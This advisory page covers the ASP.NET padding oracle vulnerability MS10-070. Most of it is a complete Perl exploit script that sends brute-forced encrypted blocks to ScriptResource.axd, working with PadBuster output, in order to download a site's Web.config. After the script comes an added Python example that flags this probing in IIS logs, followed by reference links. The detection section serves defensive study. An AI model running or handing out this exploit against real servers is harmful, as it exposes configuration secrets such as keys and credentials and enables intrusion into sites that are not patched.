ASP.NET Padding Oracle Vulnerability (MS10-070)

2010.10.07
Credit: Giorgio Fedon
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-310


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: None
Availability impact: None

# Source: http://blog.mindedsecurity.com/2010/10/breaking-net-encryption-with-or-without.html

#!/usr/bin/perl
#
# Webconfig Bruter - exploit tool for downloading Web.config
#
# To use this script you need PadBuster.
# PadBuster is a great tool and Brian Holyfield deserves all the credit.
# Download PadBuster:
# http://www.gdssecurity.com/l/b/2010/10/04/padbuster-v0-3-and-the-net-padding-oracle-attack/
#
# Giorgio Fedon - (giorgio.fedon@mindedsecurity.com)
#

use strict;
use LWP::UserAgent;
use HTTP::Request;
use Getopt::Std;
use Getopt::Long;
use MIME::Base64;
use URI::Escape;

# Definition of vars for .NET (shared by encoder())
my $returnVal;
my $b64Encoded;

if ($#ARGV < 2) {
    die "
Use: Web.config_bruter.pl ScriptResourceUrl Encrypted_Sample BlockSize

Where:
  URL             = The target URL (and query string if applicable)
  EncryptedSample = The encrypted value you want to use. This needs to come from PadBuster.
  BlockSize       = The block size being used by the algorithm (8 or 16)

PoC code by giorgio.fedon\@mindedsecurity.com
Original PadBuster code from Brian Holyfield - Gotham Digital Science

Command Example:
./Web.config_bruter.pl https://127.0.0.1:8083/ScriptResource.axd d1ARvno0iSA6Ez7Z0GEAmAy3BpX8a2 16
";
}

my $testUrl     = $ARGV[0] . "?d=";
my $sampleBytes = $ARGV[1];
my $blockSize   = $ARGV[2];
my $method      = "GET";

# Decode the URL-safe base64 sample (PadBuster output) into raw bytes
$sampleBytes = encoder($sampleBytes, 1);

my $testBytes = "\x00" x $blockSize;
my $counter   = 0;

# Use random bytes
my @nums   = (0..255);
my $status = 1;

while ($status) {
    # Fuzz the test bytes
    for (my $byteNum = $blockSize - 1; $byteNum >= 0; $byteNum--) {
        substr($testBytes, $byteNum, 1, chr($nums[rand(@nums)]));
    }

    # Combine the test bytes and the sample
    my $combinedTestBytes = encoder($testBytes . $sampleBytes, 0);
    chomp($combinedTestBytes);
    $combinedTestBytes =~ s/\%0A//g;

    # Ok, now make the request ($respStatus is the HTTP status; the outer $status
    # only controls the loop, which ends with "last" below)
    my ($respStatus, $content, $location, $contentLength) =
        makeRequest($method, $testUrl . $combinedTestBytes);

    if ($respStatus == "200") {
        # Remove this for "T" exploit
        if (index($content, "parent.Sys.Application") == -1) {
            print $content . "\n\n";
            print "Total Requests:" . $counter . "\n\n";
            print "Resulting Exploit Block:" . $combinedTestBytes . "\n\n";
            last;
        }
    }
    $counter++;
}

# The following code is taken from PadBuster. Credit: Brian Holyfield - Gotham Digital Science
#
# I also did the encoder / decoder, but your logic is definitely better
sub encoder {
    my ($toEncodeDecode, $oper) = @_;

    if ($oper == 1) {
        # Decode: .NET URL-safe base64 -> raw bytes. The trailing digit is the
        # number of "=" padding characters that were stripped.
        $toEncodeDecode =~ s/\-/\+/g;
        $toEncodeDecode =~ s/\_/\//g;
        my $count = chop($toEncodeDecode);
        $toEncodeDecode = $toEncodeDecode . ("=" x int($count));
        $returnVal = decode_base64($toEncodeDecode);
    } else {
        # Encode: raw bytes -> .NET URL-safe base64 with the pad count appended
        $b64Encoded = encode_base64($toEncodeDecode);
        $b64Encoded =~ s/(\r|\n)//g;
        $b64Encoded =~ s/\+/\-/g;
        $b64Encoded =~ s/\//\_/g;
        my $count = $b64Encoded =~ s/\=//g;
        ($count eq "") ? ($count = 0) : "";
        $returnVal = $b64Encoded . $count;
    }
    return $returnVal;
}

sub makeRequest {
    my ($method, $url) = @_;
    my ($lwp, $status, $content, $req, $location, $contentLength);

    # Setup LWP UserAgent
    $lwp = LWP::UserAgent->new(
        env_proxy             => 1,
        keep_alive            => 1,
        timeout               => 30,
        requests_redirectable => [],
    );

    $req = HTTP::Request->new($method => $url);
    my $response = $lwp->request($req);

    # Extract the required attributes from the response
    $status  = substr($response->status_line, 0, 3);
    $content = $response->content;
    #print $content;
    $location = $response->header("Location");
    if (!defined $location || $location eq "") { $location = "N/A"; }
    $contentLength = $response->header("Content-Length");

    return ($status, $content, $location, $contentLength);
}
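As an added example (not part of the advisory or the script above), a defender-side heuristic that flags the request pattern this brute-force loop leaves in IIS W3C logs: many requests from one client to ScriptResource.axd or WebResource.axd, each with a different d= value, most of them answered with a non-200 status. The field order and the log lines are constructed for this example; adapt the parser to the #Fields header your server writes.

```python
# Added example (not part of the advisory or the exploit script): heuristic detection of
# padding-oracle probing against ASP.NET resource handlers in IIS W3C log lines.
# Assumed field order (constructed; match it to your #Fields header):
#   date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
from collections import defaultdict
from urllib.parse import parse_qs

HANDLERS = ("/scriptresource.axd", "/webresource.axd")

def parse_line(line):
    """Return (client_ip, uri_stem, d_value, status), or None for comments and short lines."""
    if line.startswith("#") or not line.strip():
        return None
    parts = line.split()
    if len(parts) < 7:
        return None
    _date, _time, c_ip, _method, stem, query, status = parts[:7]
    d_vals = parse_qs("" if query == "-" else query).get("d", [])
    return c_ip, stem.lower(), (d_vals[0] if d_vals else None), int(status)

def find_probing_clients(lines, min_distinct=20, max_success_ratio=0.2):
    """Flag clients sending >= min_distinct different d= values to a handler with at most
    max_success_ratio of them answered 200. Returns {ip: (distinct_d, non_200_count)}."""
    stats = defaultdict(lambda: [set(), 0, 0])  # distinct d values, non-200 count, total
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        c_ip, stem, d, status = rec
        if stem not in HANDLERS or d is None:
            continue
        stats[c_ip][0].add(d)
        stats[c_ip][2] += 1
        if status != 200:
            stats[c_ip][1] += 1
    flagged = {}
    for c_ip, (d_set, non200, total) in stats.items():
        if len(d_set) >= min_distinct and (total - non200) / total <= max_success_ratio:
            flagged[c_ip] = (len(d_set), non200)
    return flagged

# Constructed sample log: 25 probes from 10.0.0.5 with a different d= each time (24 fail,
# the last one succeeds), plus a normal client fetching one legitimate resource twice.
SAMPLE_LOG = ["#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status"]
SAMPLE_LOG += [f"2010-10-07 10:00:{i:02d} 10.0.0.5 GET /ScriptResource.axd d=AAAA{i:04x}blk 500"
               for i in range(24)]
SAMPLE_LOG += ["2010-10-07 10:00:24 10.0.0.5 GET /ScriptResource.axd d=BBBBblk 200"]
SAMPLE_LOG += ["2010-10-07 10:01:00 192.0.2.10 GET /ScriptResource.axd d=legitblk 200"] * 2

if __name__ == "__main__":
    print(find_probing_clients(SAMPLE_LOG))  # {'10.0.0.5': (25, 24)}
```

The thresholds are starting points; a single client legitimately fetching many distinct script resources will have a high success ratio and so is not flagged.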

References:

http://xforce.iss.net/xforce/xfdb/61898
http://www.vupen.com/english/advisories/2010/2429
http://www.troyhunt.com/2010/09/fear-uncertainty-and-and-padding-oracle.html
http://www.theinquirer.net/inquirer/news/1732956/security-researchers-destroy-microsoft-aspnet-security
http://www.securityfocus.com/bid/43316
http://www.microsoft.com/technet/security/Bulletin/MS10-070.mspx
http://www.microsoft.com/technet/security/advisory/2416728.mspx
http://www.ekoparty.org/juliano-rizzo-2010.php
http://www.dotnetnuke.com/Community/Blogs/tabid/825/EntryId/2799/Oracle-Padding-Vulnerability-in-ASP-NET.aspx
http://weblogs.asp.net/scottgu/archive/2010/09/18/important-asp-net-security-vulnerability.aspx
http://twitter.com/thaidn/statuses/24832350146
http://threatpost.com/en_us/blogs/new-crypto-attack-affects-millions-aspnet-apps-091310
http://securitytracker.com/id?1024459
http://secunia.com/advisories/41409
http://pentonizer.com/general-programming/aspnet-poet-vulnerability-what-else-can-i-do/
http://isc.sans.edu/diary.html?storyid=9568
http://blogs.technet.com/b/srd/archive/2010/09/17/understanding-the-asp-net-vulnerability.aspx

